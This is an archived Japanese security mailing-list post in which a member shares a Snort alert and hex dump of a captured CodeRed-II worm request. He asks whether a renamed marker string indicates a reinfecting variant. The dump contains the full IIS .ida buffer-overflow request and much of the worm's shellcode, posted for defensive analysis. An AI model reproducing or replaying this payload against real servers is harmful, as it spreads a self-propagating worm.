[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[stalk:00824] CodeRedII 亜種 (?)



┏━━━━┓ ===インターネットで仕事獲得:楽天ビジネス=== ┏━━━━┓
┃案件数は┃ Web構築・印刷・会計処理・翻訳 様々な分野で ┃成約実績┃
┃2000件超┃    全国の見込案件を次々ご紹介!!!    ┃ 多数! ┃
    ━┻━    この広告を見たと言えば参加特典も!(8月末まで)  ━┻━
  急げ!⇒ http://business.rakuten.co.jp/apply/index.cfm?afl=fvq 
------------------------------------------------------------------------


塚本です

迷惑っぽいですが(^^;)、snortのdumpをくっつけます。

見飽きた CodeRedII ぽいですが、通常"CodeRedII"の文字列が
入っているところが

> 00 00 00 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 8B 1C 24  ..._________...$

5F(HEX)になってます。たしかここの文字列でGlobal atom
とかいうのを作って感染済みかどうか、活性化するかを
判断していたように記憶してます。
こいつはCodeRedII感染ホストにも二重に感染するCodeRedII
亜種なのかな?


[**] CodeRed-II IDA Overflow [**]
08/22-17:06:31.909462 0:0:A:60:AA:55 -> 0:0:F4:5C:58:69 type:0x800 len:0x5BC
202.212.185.151:1044 -> 202.212.33.50:80 TCP TTL:122 TOS:0x0 ID:31635 IpLen:20 DgmLen:1454 DF
***A**** Seq: 0xDF52DF9F  Ack: 0xD269F5B0  Win: 0x4248  TcpLen: 20
47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  ?XXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  X%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c
33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35  3%u0003%u8b00%u5
33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25  31b%u53ff%u0078%
75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54  u0000%u00=a  HTT
50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74  P/1.0..Content-t
79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F  ype: text/xml.Co
6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33  ntent-length: 33
37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00  79 ........`....
00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00  ....dg.6..dg.&..
E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF  .....h......\...
50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40  P.U...\...P.U..@
10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00  .....X....U.=...
00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6  ....=...........
C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00  ...T....u..~0...
00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A  ........F0......
00 00 00 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 8B 1C 24  ..._________...$
FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50  .U.f.....8.....P
FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50  .......j...P...P
8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84  ..8...P.E..p....
00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4  .....8....thS.U.
FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00  .U..E.i.T...,...
81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7  ..,.............
89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00  .F4.E.Pj..u.....
00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55  ......j.j..U.P.U
D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00  .Ou..;...i.T....
5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A  \&....\&.W.U.j.j
16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45  ..U.j..U....F4)E
84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0  .jd.U...<...P.U.
0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7  ...<...=....s...
85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF  .>......s.f..p..
FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00  ...f..r....P.d..
00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8  ...t...j.j.j..U.
83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80  ...t..E.j.Th~f..
FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50  .u..U.Yj...p...P
FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33  .u..U........tK3
DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF  ..U.=3'..u?..h..
FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7  .......l........
85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF  .`........E...d.
FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF  ....h...Pj...`..
FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66  .Pj.j..U..j.Th~f
04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00  ...u..U.Y...u1..
00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00  ...X-....j.h....
50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00  P.u..U.=....u.j.
6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF  j...\...P.u..U..
75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81  u..U..........w.
C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00  ..........xu....
F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06  ..`......d$.dg..
00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26  ..Xa..dg.6..dg.&
00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50  ..f.;MZu..K<.<.P
45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C  E..u..T.x...B..<
03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75  .KERNu..|..EL32u
BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47  .3.I.r ...A..<.G
65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03  etPu..|..rocAu..
4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03  J.I...J$........
4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00  J.......D$$dg...
00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8  .Xa..Q....]..E..
0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41  ....LoadLibraryA
00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43  ..u..U..E......C
72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF  reateThread..u..
55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63  U..E......GetTic
6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC  kCount..u..U..E.
E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55  .....Sleep..u..U
F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74  ..E......GetSyst
65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00  emDefaultLangID.
FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65  .u..U..E......Ge
74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79  tSystemDirectory
41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00  A..u..U..E......
43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8  CopyFileA..u..U.
89 45 DC E8 10 00                                .E....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

-- 
塚本  弘
--
- このメイリングリストに関する質問・問い合せ等は
- <security-talk@xxxxxxxxxx>までお知らせください
--
------------------------------------------------------------------------
     こんなの本当の自分じゃない!心機一転出なおす!!      
  http://job.infoseek.co.jp/JobTop?pg=job_top.html&sv=SJ&svx=971122